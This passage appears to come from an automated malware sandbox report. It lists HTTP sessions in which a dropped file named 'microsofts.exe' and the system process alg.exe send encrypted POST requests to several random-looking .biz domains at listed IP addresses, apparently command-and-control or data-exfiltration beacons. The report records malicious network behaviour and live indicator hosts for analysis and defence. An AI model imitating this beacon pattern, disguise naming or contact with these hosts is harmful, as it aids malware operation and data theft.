                                                                                                                                                                                                                                                                                                                                                                                                              8192.168.2.559391172.234.222.143801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.091259003 CET356OUTPOST /qljrltdbsuxud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.091412067 CET828OUTData Raw: 5d 60 c0 93 b1 44 b2 29 30 03 00 00 63 81 e1 bf 4e 5d 4e 8d 7e 4a 10 b5 98 ae 30 1c bb 83 be d4 32 eb fd 0e 35 6b d5 ad f8 94 83 42 7e 16 3c ba 22 15 01 ca a7 96 02 af 81 cf 8a 03 57 c2 c8 d7 dd 4b aa 27 94 dc ab 17 b9 12 15 25 10 b5 e8 eb 8f 74
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ]`D)0cN]N~J025kB~<"WK'%tjn4\4J#$e2E!E*PgeYM[!5"UsyW@orj5?4gSTVOxVbRxHAW!Fs,1RrE


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              9192.168.2.55939244.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.378994942 CET348OUTPOST /ioqv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.379080057 CET778OUTData Raw: 22 c0 79 42 f9 d2 bf 3b fe 02 00 00 36 35 b8 0c 1e 7f ac ff 3e b7 34 55 ee fb 59 56 18 29 2f 2e 95 78 42 98 f3 8a e8 51 71 76 45 ff 5a 6c a5 b2 97 0e 7a c9 98 87 0f dc 02 7d 0e b6 b4 1d 34 6f 7a 6c 8b 4a 17 1d cf 2a bb e8 d3 6b 87 13 3b 4f 06 4a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "yB;65>4UYV)/.xBQqvEZlz}4ozlJ*k;OJ_(h~([Y(`d2eqAY$D->xMkN4EO|yH&N7,?{?@>R@"ERBD)L/SNB'&G-
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.029869080 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8bbe1a25b7d021b62dfe708f0ffdf72e|173.254.250.76|1730822576|1730822576|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              10192.168.2.559393172.234.222.143801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.791968107 CET353OUTPOST /plvfcdbflq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.791968107 CET828OUTData Raw: d9 b7 e0 4c c1 e0 fc 73 30 03 00 00 2b cd a9 82 bf 1e 48 6f 04 a1 45 83 85 87 72 e6 2a 56 81 7c 4a 6a 39 d0 ae 34 30 3c 67 99 77 06 32 cf 31 04 05 89 6c e3 43 a3 35 be 76 86 55 92 1d fe 56 d9 b2 ac 6f ad 8b 95 fe ab 1f 6e f3 ab c6 d3 6d ff 0e 97
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Ls0+HoEr*V|Jj940<gw21lC5vUVonmXbFjV<lr&D]+28r*U&GTc47[rJW>%/pQ-4YsCF`0s3jTuM;Zt&5q;LQC#WC


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              11192.168.2.559394172.234.222.138801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134841919 CET354OUTPOST /blqwxioreon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134864092 CET778OUTData Raw: 33 66 ca 13 8c 10 ea a1 fe 02 00 00 57 bb 49 ed 21 4a be 15 47 b9 99 c9 1e 29 72 b9 29 a0 0a 19 8c cc d2 4d 2e f8 5e 6d cd dd 88 ad 52 cd 02 e3 6a e7 b1 42 45 a2 63 8c 57 c4 ac 94 28 14 d6 29 fb f1 c2 29 e6 b5 01 97 aa 35 d3 c8 c9 80 08 48 d4 d3
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3fWI!JG)r)M.^mRjBEcW())5HO}}vZ*l^f+"Q`.>kI:|dq0]lJ%`6BQIJ%d49j=gfJS$?lJZ@BCGo4uCAk(AZqh,)lmX;G@6


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              12192.168.2.55939518.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476269007 CET358OUTPOST /vydffyeediqodv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476289034 CET828OUTData Raw: f1 47 24 20 e0 39 58 ab 30 03 00 00 a0 16 8f 5d 50 c4 2e 38 a4 66 59 71 96 cd 7a 38 8a 8e a7 57 c3 83 be ff 72 1a b1 28 59 fc b5 e7 92 e8 3d 10 95 25 d9 1d c6 30 e1 4e 8a e2 07 4d af a2 67 0b 1b f7 2d ee fd da ca ab 89 60 2e d3 bb 62 96 ce e2 99
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: G$ 9X0]P.8fYqz8Wr(Y=%0NMg-`.bX{XPfPF,{%{_#-/,yim|D7RwKQANJTo=} .KtXjF@X>'FzMX#{mzW7r8UYk#Q
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.923948050 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a22c7690e87e3869706fd2ea3a30fea6|173.254.250.76|1730822578|1730822578|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              13192.168.2.559396172.234.222.138801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926479101 CET351OUTPOST /eybmhvtk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926534891 CET778OUTData Raw: a7 ba 92 05 25 0a 7e e4 fe 02 00 00 5d 37 91 23 e2 0c 09 75 e0 38 68 8b 19 48 ae bf 59 35 92 bc 48 66 25 17 7f 1a 82 40 c3 f8 04 d9 9e b3 76 45 34 f3 c0 a5 7e 5d 45 f0 d8 cc 6f bf 99 9e 04 5d cc 0f f4 01 30 d4 39 5d 4d d5 32 2c 06 b8 a9 1b 72 5d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: %~]7#u8hHY5Hf%@vE4~]Eo]09]M2,r]]16jYNT|\qGt+fQ~!k)?+kyS\0&+k`[y~O@LDKWZc1n[fZ$@^+6SQ8mcMK9fhx}=`"M@'o


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              14192.168.2.55939818.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.845659018 CET350OUTPOST /ovtsne HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.845685959 CET778OUTData Raw: 34 e9 fb 62 ca 69 fa 2d fe 02 00 00 0c 57 6d 66 64 d4 1d 3d 35 00 4d 99 57 ae e8 9a a3 e4 5f 1b 30 71 f3 53 6e 3d ae f5 94 28 70 73 c7 a6 85 e9 bc ce 2f 67 01 08 80 bf 51 8c f9 44 34 30 40 8c 3e ca ca ea 35 9e d1 ae c2 2b 9b 3b 09 61 d9 86 ed 30
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 4bi-Wmfd=5MW_0qSn=(ps/gQD40@>5+;a0nu>AEIzKdD/y1rE(#W^UqJ/:7M,A4><63s?^TsPctRMDWg+9?i[|/Fy-_aluY{tPV
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.281542063 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7f1290ff57d342a11e201adeb4d84dcc|173.254.250.76|1730822580|1730822580|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              15192.168.2.55939982.112.184.197801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.968955994 CET345OUTPOST /ebm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.968977928 CET828OUTData Raw: 42 6b c4 32 aa 66 76 68 30 03 00 00 66 e2 ca 66 e2 e0 50 11 88 f5 46 0a 9e cd 9c 2e 57 56 4e 4b 54 43 c5 21 f7 d6 2f b2 5e 23 a7 ef 4c 7f ce 1b 60 68 ad 31 ce 46 cb 73 9b 76 7c d9 b4 ab 5c 59 09 b2 41 81 51 0e ba f0 53 77 a9 e6 ad 37 3a 15 9d 2b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Bk2fvh0ffPF.WVNKTC!/^#L`h1Fsv|\YAQSw7:+j*fbBto;tx)K$Yh^I#!D/f;Oa*vZH<O M~Iq_JaXU4`_ &o1aoz:&9$(3t6N


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              16192.168.2.55940282.112.184.197801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.391305923 CET350OUTPOST /oiarwfji HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.391361952 CET778OUTData Raw: 3b 99 f9 1b e1 3e 8d 19 fe 02 00 00 3a 89 3c 7e 8a 7b 17 de 7e 2e 89 10 e7 26 a9 bf 5d 8a 59 24 03 db 49 fc c4 b7 9f 78 3a 48 ff 38 78 e5 ac 95 4b 0f d8 80 35 94 ce 26 c0 e8 aa ad fa 00 5d 84 cd fb 94 93 ff a6 76 5e 17 69 8e 08 00 36 26 3d 86 4f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ;>:<~{~.&]Y$Ix:H8xK5&]v^i6&=OhWb33Dul.}g3c(gAY+Bw>G'1*z4@j6!GUV0cwREUK]:x}QGpV3-1


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              17192.168.2.55941682.112.184.197801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.154068947 CET357OUTPOST /tookpqdumsvuivi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.154093981 CET778OUTData Raw: 8e 27 44 e2 15 83 98 ee fe 02 00 00 62 4f c3 6c 62 35 e5 5b 98 96 1c 93 53 cd 21 1f 04 67 d3 a9 b2 9a c5 f9 35 48 a7 b6 ea df 0e 60 40 1f 01 19 8f 42 18 9e 49 c9 8c 74 57 c8 93 f3 95 9a e0 17 be 25 e7 a9 0e e9 3a 4e 3f d5 de b6 e4 84 6d 07 35 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 'DbOlb5[S!g5H`@BItW%:N?m5/_l'gEMq+%|Xn,g97|f"8%vuCxy1oM4`&Rb~nnXg{qI,?&&P|"Dg[86fZy^


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              18192.168.2.55943782.112.184.197801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.123045921 CET358OUTPOST /tqkivcurvenplovb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.123068094 CET828OUTData Raw: ef 56 d7 64 fe 1b f5 05 30 03 00 00 ec bb 16 63 46 24 24 84 68 22 19 2b 57 1f b3 56 7f 9a 96 c1 84 b4 c0 d2 e1 e1 fd d4 d7 14 c6 0c ca 76 8d 71 17 c8 de ca 49 09 e7 22 71 71 0e 18 34 30 94 45 8a 6e 72 d3 46 f7 4a a5 06 02 60 b5 18 3b 06 8b a5 0d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Vd0cF$$h"+WVvqI"qq40EnrFJ`;'e\Np5\5O5j3wh.Nq;b)+]}eeJp^R /d LBGivGJ`JYAFY5\.KP2"*


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              19192.168.2.55944382.112.184.197801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.155162096 CET347OUTPOST /dh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.156380892 CET778OUTData Raw: ab a1 cc 13 15 f9 3e 91 fe 02 00 00 dd 11 ba 59 a1 aa b4 8c 6e 48 b6 df 5d 7f 8b b3 34 4a 39 df 9b 1d 71 47 6a 81 98 98 a9 c9 72 94 87 c1 26 87 7e 93 5b 1d 0f d2 57 55 6c 7d 61 d3 35 00 cb 83 88 a1 dc a4 c1 e6 46 89 10 22 95 9f 93 ab 25 b8 ee 65
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: >YnH]4J9qGjr&~[WUl}a5F"%e1GvwXK`Ls 1w31037%;HK]KPDc6n3Fvz4%L03:Lp0:=BBI KOY&925AV4f


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              20192.168.2.55946582.112.184.197801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.106858015 CET350OUTPOST /dltqf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.106929064 CET778OUTData Raw: 94 55 d2 4f 6d 04 5c 28 fe 02 00 00 1f b3 d0 ca dc cf 58 fb 36 f4 02 90 49 c7 c8 d8 1c ea ff e8 20 32 11 b3 f9 f3 51 d6 dc 79 ee ab 72 4b 53 8d 2a 44 90 dc d1 05 8c 68 a7 23 43 d9 a8 fc 9b 8f 06 82 dd 79 f6 98 06 ee 75 db 1b 9a 80 67 b9 d3 be a7
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: UOm\(X6I 2QyrKS*Dh#Cyug(K+XE&8#+vConZf/)G-,41~B6HNjIs1eo^}"I8^Fch*p6:zB{gng


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              21192.168.2.55948782.112.184.197801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.653625965 CET352OUTPOST /augbqjw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.653646946 CET828OUTData Raw: 76 be 29 51 14 c7 a7 53 30 03 00 00 8c b0 0d 1a 6a 61 1a 4b 9b 93 85 db f3 97 32 3e ad a6 58 38 c4 0e a9 4a b4 bd 69 d4 a2 8c 17 79 8d fa b8 03 56 2f 19 11 cd ea 09 a9 68 59 f2 53 91 f6 ba b7 f9 df 6c 77 b4 6f 5f b3 7e 78 16 b6 12 9f 7b c5 85 f7
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v)QS0jaK2>X8JiyV/hYSlwo_~x{&44Z`2Dtu`Bry|_.qW<F}O<B_l{'.cAq@nv`vq?u)n>|}~t3Zx;)14^0HC[1F.


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
